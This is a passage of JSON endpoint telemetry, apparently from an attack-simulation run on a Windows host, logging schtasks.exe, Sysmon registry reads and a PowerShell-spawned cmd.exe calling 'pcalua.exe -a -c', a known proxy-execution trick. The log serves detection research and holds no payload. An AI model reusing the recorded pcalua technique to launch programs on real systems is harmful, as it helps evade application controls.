"image_load", - "image_name": "sechost.dll", - 
"image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971670000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": "C:\\Windows\\System32\\clbcatq.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971670000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "taskschd.dll", - "image_path": "C:\\Windows\\System32\\taskschd.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971670000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\System32\\sspicli.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971670000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971670000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971670000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "dnsapi.dll", - "image_path": "C:\\Windows\\System32\\dnsapi.dll", - "pid": 2812, - 
"process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "registry", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\WINDOWS\\system32\\schtasks.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573971820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "registry", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\WINDOWS\\system32\\schtasks.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573971820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "registry", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\WINDOWS\\system32\\schtasks.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - 
"timestamp": 131883573971820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "rasadhlp.dll", - "image_path": "C:\\Windows\\System32\\rasadhlp.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "registry", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\WINDOWS\\system32\\schtasks.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573971820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "registry", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\WINDOWS\\system32\\schtasks.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573971820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "FWPUCLNT.DLL", - "image_path": "C:\\Windows\\System32\\FWPUCLNT.DLL", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "registry", - "pid": 2812, - "process_name": "schtasks.exe", - 
"process_path": "C:\\WINDOWS\\system32\\schtasks.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573971820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "registry", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\WINDOWS\\system32\\schtasks.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573971820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "msv1_0.dll", - "image_path": "C:\\Windows\\System32\\msv1_0.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "NtlmShared.dll", - "image_path": "C:\\Windows\\System32\\NtlmShared.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "cryptdll.dll", - "image_path": "C:\\Windows\\System32\\cryptdll.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971980000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "process", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "subtype": "terminate", - "timestamp": 131883573971980000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - 
"event_type": "file", - "file_name": "SCHTASKS.EXE-2DE769BF.pf", - "file_path": "C:\\Windows\\Prefetch\\SCHTASKS.EXE-2DE769BF.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573971980000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "process", - "pid": 7172, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573971980000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010AD105701}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 2828, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573972110000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010F9155701}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2828, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573971980000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010F9155701}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2828, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573971980000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010F9155701}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2828, - "process_name": "cmd.exe", - "process_path": 
"C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573971980000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010F9155701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2828, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573971980000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010F9155701}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2828, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573972140000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010F9155701}" - }, - { - "event_type": "process", - "pid": 2828, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573972140000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010F9155701}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"pcalua.exe -a -c\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7004, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573973190000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7004, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573973070000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}" - }, - { - "event_type": "image_load", - 
"image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7004, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573973070000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7004, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573973070000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7004, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573973070000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7004, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573973230000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}" - }, - { - "event_type": "registry", - "pid": 7004, - "process_name": "cmd.exe", - "process_path": "C:\\WINDOWS\\system32\\cmd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", - "registry_value": "pcalua.exe", - "timestamp": 131883573973230000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}" - }, - { - "command_line": "pcalua.exe -a -c", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": 
"C:\\Windows\\System32\\cmd.exe", - "pid": 2036, - "ppid": 7004, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "subtype": "create", - "timestamp": 131883573973300000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}", - "unique_ppid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973390000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573973390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573973390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", 
- "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573973540000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "pcalua.exe", - "image_path": "C:\\Windows\\System32\\pcalua.exe", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973390000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": 
